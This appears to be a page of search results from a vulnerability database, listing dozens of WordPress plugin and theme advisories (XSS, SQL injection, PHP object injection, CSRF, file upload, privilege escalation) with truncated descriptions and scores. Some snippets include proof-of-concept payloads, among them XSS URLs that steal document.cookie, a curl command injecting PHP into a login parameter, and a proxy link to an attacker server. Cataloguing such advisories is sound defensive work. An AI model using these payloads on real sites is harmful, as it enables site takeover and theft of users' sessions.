Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
added 2020/11/05 12:0 a.m.18 views

Augmented Reality <= 1.2.0 - Unauthenticated PHP File Upload leading to RCE

The elFinder connector used allows upload of PHP files as the 'uploadAllow' options contains 'text/x-php'. This allows an unauthenticated user to upload PHP files, leading to a RCE vulnerability. The issue is similar to https://wpscan.com/vulnerability/10389 POST...

7.4AI score
Exploits0References1
wpexploit
wpexploit
added 2020/11/03 12:0 a.m.18 views

GDPR CCPA Compliance Support < 2.4 - Unauthenticated PHP Object Injection

The GDPR CCPA Compliance Support WordPress plugin was vulnerable to an Unauthenticated PHP Object Injection security vulnerability. The vulnerability could triggered within the "njtgdprallowpermissions" Base64 encoded cookie value...

2.3AI score
Exploits0References3
wpexploit
wpexploit
added 2020/07/15 12:0 a.m.18 views

Golo < 1.3.3 - Unauthenticated Reflected XSS

An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress. https://example.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3DalertXSS%2F%2F%22%3E&posttype=place...

1.5AI score
Exploits0References3
wpexploit
wpexploit
added 2020/07/13 12:0 a.m.18 views

Findus - Directory Listing < 1.1.15 - Authenticated Persistent XSS

Authenticated Persistent XSS vulnerability was discovered in the «Findus - Directory Listing WordPress Theme», tested version — v1.1.14. Injected payload will trigger in the admin dashboard, in the «My listings» page and on listing page itself. POST /submit-listing/ HTTP/1.1 Host: example.com...

0.5AI score
Exploits0References2
wpexploit
wpexploit
added 2020/01/24 12:0 a.m.18 views

WP DS FAQ Plus < 1.4.2 - Stored Cross-Site Scripting (XSS)

Weak security checks in the Question form. https://www.youtube.com/watch?v=UPYitCT9xtk...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2019/09/08 12:0 a.m.18 views

Selio - Real Estate Directory <= 1.1 - SQL Injection & Persistent XSS

----- SQL Injection: ----- Vulnerable 'id' parameter is https://listing-themes.com/selio-wp/wp-admin/admin.php?page=ownlistingaddlisting=21 ----- Persistent XSS: ----- You need a new user account, then go to any property listing on the website and use 'ENQUIRY FORM' on the right sidebar. Or you...

7.8AI score
Exploits0References1
wpexploit
wpexploit
added 2019/09/05 12:0 a.m.18 views

API Bearer Auth <= 20181229 - Unauthenticated Reflected XSS

The server GET parameter of the swagger/swagger-config.yaml.php file is affected by a reflected XSS issue. /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=alert"XSS"...

4.3CVSS1.7AI score0.05698EPSS
Exploits2References1
wpexploit
wpexploit
added 2019/08/25 12:0 a.m.18 views

UserPro <= 4.9.34 - Unauthenticated Reflected XSS

Edit WPscanTeam: August 26th, 2019 - Envato Notified September 2nd, 2019 - v4.9.34 released, still vulnerable September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue...

4.3CVSS1.8AI score0.82962EPSS
Exploits6References2
wpexploit
wpexploit
added 2019/08/03 12:0 a.m.18 views

Rencontre < 3.2.2 - Authenticated Stored XSS via facebook parameter & SQL Injection

An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Affected Version Version: alert'XSS'// Encoded-Payload:...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2019/07/27 12:0 a.m.18 views

Simple Membership <= 3.8.4 - Cross-Site Request Forgery (CSRF)

CSRF issue in the Bulk Operation menu tab https://youtu.be/HkTD8DhhwhM https://gofile.io/?c=zWYnLM - CSRF html files...

6.8CVSS1.3AI score0.0315EPSS
Exploits6References1
wpexploit
wpexploit
added 2019/07/09 12:0 a.m.18 views

Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS

The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability. When logged in with an account with administrator capabilities: https:///wp-admin/admin.php?page=photoblocks-edit&id="...

3.5CVSS1.2AI score0.01318EPSS
Exploits1References1
wpexploit
wpexploit
added 2019/07/05 12:0 a.m.18 views

Zoner - Real Estate <= 4.1 - Reflected & Stored XSS

Weak security measures like bad input fields data filtering has been discovered in the 'Zoner - Real Estate WordPress Theme'. PoC Stored XSS Injection: Register on the demo website and go to https://zoner.fruitfulcode.com/author/yourlogin/?profile-page=myprofile page. Inside any text field type "...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2019/06/26 12:0 a.m.18 views

LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS

The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechatemail option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page. CSRF and XSS fixed in...

6.5AI score
Exploits0References1
wpexploit
wpexploit
added 2018/08/31 12:0 a.m.18 views

UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)

An XSS vulnerability that affects from version 2.13 to 4.9.23. POST /wp-admin/admin-ajax.php Host: domain.com action=userproshortcodetemplate&shortcode=userpro id=1 layout="float" collageperpage="20" emdpaginatetop="1" emdpaginate="1" emdgender="Gender,radi...

4.3CVSS1.3AI score0.01345EPSS
Exploits2References3
wpexploit
wpexploit
added 2018/05/18 12:0 a.m.18 views

ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution

The plugin ProfileGrid – User Profiles, Groups and Communities versions prior to 2.8.6 is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin. Send an authenticated POST request to...

6.5CVSS2.1AI score0.03883EPSS
Exploits2References1
wpexploit
wpexploit
added 2018/03/02 12:0 a.m.18 views

File Manager <= 5.0.0 - Information Disclosure

The Giribaz File Manager plugin logged activity related to the plugin in /wp-content/uploads/file-manager/log.txt. If user edits wp-config.php file using this plugin, the wp-config.php contents get added to the file which is not protected and contains database credentials, salts, etc. These files...

5CVSS1.1AI score0.02872EPSS
Exploits1References2
wpexploit
wpexploit
added 2018/01/04 12:0 a.m.18 views

buddypress-xprofile-custom-fields-type 2.6.3 - Authenticated Arbitrary File Deletion

Type user access: any user registered used in BuddyPress. $POST 'field' . $fieldid . 'hiddenfile' is not escaped. $POST 'field' . $fieldid . 'deleteimg' is not escaped. Code File: wp-conent/plugin/buddypress-xprofile-custom-fields-type/bp-xprofile-custom-fields-type.php Lines: 452, 472, 496, 513,...

7.5AI score
Exploits0References1
wpexploit
wpexploit
added 2017/10/01 12:0 a.m.18 views

MarketPress <= 3.2.6 - PHP Object Injection

The MarketPress plugin installs to a directory named wordpress-ecommerce versions 3.2.6 and prior are vulnerable to a PHP Object Injection attack from the cart cookie value stored in connection with this plugin. Send an object to the site using the mpglobalcart cookie value and it will be...

1.4AI score
Exploits0References2
wpexploit
wpexploit
added 2017/08/17 12:0 a.m.18 views

Embed Images in Comments <= 0.5 - Unauthenticated Stored XSS

Unescaped src and href attribute replacements allows breaking out of the generated replacement tags. A comment containing the following "image" http://codeseekah.com/1.jpg"onload="alert1".jpg will generate an alert box...

4.3CVSS0.4AI score0.00905EPSS
Exploits1References1
wpexploit
wpexploit
added 2017/07/26 12:0 a.m.18 views

FormCraft - Premium WordPress Form Builder <= v3.2.31 - Authenticated Stored XSS

WordPress FormCraft Premium WordPress Form Builder versions 3.2.31 and below suffer from a persistent Cross-Site Scripting XSS vulnerability. Authenticated Stored XSS: New Form Heading Heading Text input field is vulnerable. The payload will execute when the form is displayed...

3.5CVSS0.5AI score0.00696EPSS
Exploits1References2
wpexploit
wpexploit
added 2017/05/11 12:0 a.m.18 views

User Access Manager <= 2.0.8 - Authenticated Reflected Cross-Site Scripting (XSS)

Not patched in 2.0.0 despite what the advisory states. http://www.example.com/wp-admin/admin.php?page=uamusergroup&uamaction=editusergroup&userGroupId=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22...

1.8AI score
Exploits0References2
wpexploit
wpexploit
added 2017/04/27 12:0 a.m.18 views

My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection

The plugin my-geo-posts-free insecurely trusts serialized data submitted over HTTP requests. This opens up the site to a PHP object injection vulnerability potential exploit vector. Attack is exploitable over HTTP requests to sites with the my-geo-posts-free Plugin. The original researcher notifi...

0.5AI score
Exploits0References1
wpexploit
wpexploit
added 2016/11/28 12:0 a.m.18 views

WP Whois Domain <= 1.0.0 - Unauthenticated Cross-Site Scripting (XSS)

The plugin is still affected and has been closed...

4.3CVSS0.9AI score0.00966EPSS
Exploits2References1
wpexploit
wpexploit
added 2016/09/19 12:0 a.m.18 views

N-Media Website Contact Form with File Upload - Arbitrary File Upload

The website-contact-form-with-file-upload WordPress plugin was affected by an Arbitrary File Upload security vulnerability...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2016/04/13 12:0 a.m.18 views

WHIZZ <= 1.0.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The WHIZZ WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="alert1;"...

4.3CVSS1.1AI score0.03432EPSS
Exploits2References2
wpexploit
wpexploit
added 2016/04/12 12:0 a.m.18 views

Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="alert1;"...

4.3CVSS0.5AI score0.04448EPSS
Exploits2References2
wpexploit
wpexploit
added 2016/04/12 12:0 a.m.18 views

Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="alert1;"...

4.3CVSS0.9AI score0.04195EPSS
Exploits2References2
wpexploit
wpexploit
added 2016/01/28 12:0 a.m.18 views

Sola Support Ticket <= 3.12 - XSS & Configuration Change

Any logged in user with any role and access to wp-admin in any way can update plugin settings including allowing HTML to be parsed. One can also change any notification messages to include JS which then can be used to obtain information by forgery. Make POST request to /wp-admin with parameters...

3.5CVSS0.5AI score0.00783EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/08/04 12:0 a.m.18 views

Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)

The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Go to the job listings page /index.php/jobs/apply/, then click on "send through your résumé", add the payload '" to the email field. The JavaScript will be executed on the...

4.3CVSS0.6AI score0.0489EPSS
Exploits6References2
wpexploit
wpexploit
added 2015/05/13 12:0 a.m.18 views

Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)

The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...

4.3CVSS0.9AI score0.01011EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/05/07 12:0 a.m.18 views

Amazon Product In a Post Plugin - SQL Injection

amazon-product-in-a-post.php - this plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb-query"DELETE FROM $wpdb-prefixamazoncache WHERE Cacheid ='$wp-queryvars'appip-cache-id'' LIMIT 1;"; sqlm...

Exploits0References1
wpexploit
wpexploit
added 2015/05/03 12:0 a.m.18 views

WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)

Vendor confirmed fixed in as 2.2.9 although this issue was not mentioned in the changelog. http://www.example.com/?s=test"...

4.3CVSS0.7AI score0.00934EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/04/20 12:0 a.m.18 views

Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement

The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/03/28 12:0 a.m.18 views

Aspose.Words Exporter < 2.0 - Unauthenticated Arbitrary File Download

The Aspose.Words Exporter WordPress plugin was affected by an Arbitrary File Download security vulnerability. The asposedocexporterdownload.php file of the plugin does not restrict access, check permission or validate the file parameter, allowing unauthenticated user to download any file from the...

3AI score
Exploits0References3
wpexploit
wpexploit
added 2015/03/10 12:0 a.m.18 views

Fraction Theme < 1.1.2 - Privilege Escalation

This vulnerability allows an attacker either authenticated or unauthenticated to escalate privileges on the site and have an admin account which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...

2.7AI score
Exploits0References3
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.18 views

Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. http://www.example.com/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&...

4.3CVSS1.9AI score0.03983EPSS
Exploits2References1
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.18 views

Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...

4.3CVSS1.1AI score0.00939EPSS
Exploits2References1
wpexploit
wpexploit
added 2020/08/31 12:0 a.m.17 views

Ceceppa Multilingua <= 1.5.17 - Authenticated Reflected Cross-Site Scripting

The tab GET parameter in the plugin's settings is vulnerable to reflected XSS attacks. The PoC will be displayed once the issue has been remediated...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2020/07/18 12:0 a.m.17 views

Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()

An attacker could exploit this issue by convincing a user to click a specially crafted URL, which will send emails from the affected user’s WordPress email account. function run var targetUrl = "http://example.com/webpage"; var email = "[email protected]"; var subject = "PoC"; var content = "add...

4.3CVSS0.3AI score0.00917EPSS
Exploits2References1
wpexploit
wpexploit
added 2020/03/27 12:0 a.m.17 views

CM Pop-Up banners < 1.4.11 - Authenticated Stored XSS

When saving a new campaign, a user with editpages capabilities can store scripts in the campaign’s pop-up content. The code can then be executed on every page on the website. A user with the editpages capability can store any script in the pop-up's content. The content is serialized and then save...

7.4AI score
Exploits0References1
wpexploit
wpexploit
added 2020/02/17 12:0 a.m.17 views

wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation

The flaw allowed anybody to escalate their privileges to those of an administrator, as long as subscriber-level registration was enabled on a given WordPress site with the vulnerable plugin installed. 1. Log in as Subscriber. 2. Scrape the page /wp-admin/index.php for the connection key. i.e. vie...

9CVSS0.5AI score0.08173EPSS
Exploits2References1
wpexploit
wpexploit
added 2020/01/21 12:0 a.m.17 views

AccessAlly < 3.3.2 - Unauthenticated Arbitrary PHP Code Execution

Prior to version 3.3.2, this plugin allowed arbitrary PHP code execution through the loginerror function. This exploit is out in the wild now and actively being exploited. curl -Ls http://www.example.com/login/?loginerror=%3C?%20$a%20=%20getcwd;%20echo%20$a;%20?%3E...

3.4AI score
Exploits0References1
wpexploit
wpexploit
added 2020/01/19 12:0 a.m.17 views

Contextual Adminbar Color < 0.3 - Authenticated Stored Cross-Site Scripting Issue

The variable $message is not escaped : $message = sanitizetextfield $currentsettings'message' ; Then, it's printed in a value attribute : value="" Edit WPScanTeam: Put the payload below in the custom message field in the plugin's settings page Tools Adminbar Settings: " onfocus=alert2...

0.9AI score
Exploits0References1
wpexploit
wpexploit
added 2020/01/13 12:0 a.m.17 views

Computer Repair Shop < 2.0 - Authenticated Stored XSS

Computer Repair Shop is vulnerable to stored XSS. When a user has admin capabilities, malicious code can be submitted through the plugin's options. Fixed in version 2.0. The plugin's options provided a basic HTML validation, which could be bypassed by copying + pasting malicious code into the...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2019/12/31 12:0 a.m.17 views

Donorbox 7.1~7.1.1 - Stored Cross-Site Scripting via Shortcode

In Donorbox WordPress plugin, one can perform an XSS attack via the included shortcode by inserting arbitrary HTML attributes. This vulnerability was introduced in v7.1 and fixed in v7.1.2. donate url='/?" autofocus onfocus="alertwindow" abitraryAttributeToValidateShortcodeParsing="'...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2019/10/31 12:0 a.m.17 views

WP Google Review Slider <= 6.1 - Authenticated SQL Injection

tid parameter vulnerable to SQLi. Note WPScanTeam: v6.1 has been pathed directly in the tags https://plugins.trac.wordpress.org/browser/wp-google-places-review-slider/tags/6.1/admin/partials/templatesposts.phpL58. However the the issue can be verified with v6.0 sqlmap identified the following...

0.2AI score
Exploits0
wpexploit
wpexploit
added 2019/07/27 12:0 a.m.17 views

Custom Simple RSS <= 2.0.6 - CSRF

CSRF issue in the Custom Simple Rss Plugin https://youtu.be/R0VrTpjaRg https://gofile.io/?c=jmVseA - CSRF html file...

4.3CVSS1.4AI score0.00623EPSS
Exploits1
wpexploit
wpexploit
added 2019/07/17 12:0 a.m.17 views

All-in-One WP Migration <= 6.97 - Authenticated Cross-Site Scripting (XSS)

An attacker would already have to be able to either compromise the database or gain access to a user account with high enough privileges to view the backup history, so some damage has already been done, but such an attacker could then also insert some XSS in order to compromise other admin users...

Exploits0References2
wpexploit
wpexploit
added 2019/06/27 12:0 a.m.17 views

Block WP Login <= 1.3.0 - CSRF and Unauthorised Settings Update

Lack of CSRF and authorisation checks in the bwplconfigureslug function registered as an admininit action could allow attacker via CSRF, or unauthenticated using the admin-ajax.php to change the plugin settings located at /wp-admin/options-permalink.php and disable the protection offered. v1.3.1...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2019/01/08 12:0 a.m.17 views

MapSVG Lite <= 3.2.3 - Cross-Site Request Forgery (CSRF)

CSRF in the mapsvgsave AJAX method...

6.8CVSS1AI score0.00795EPSS
Exploits2References1
Total number of security vulnerabilities4359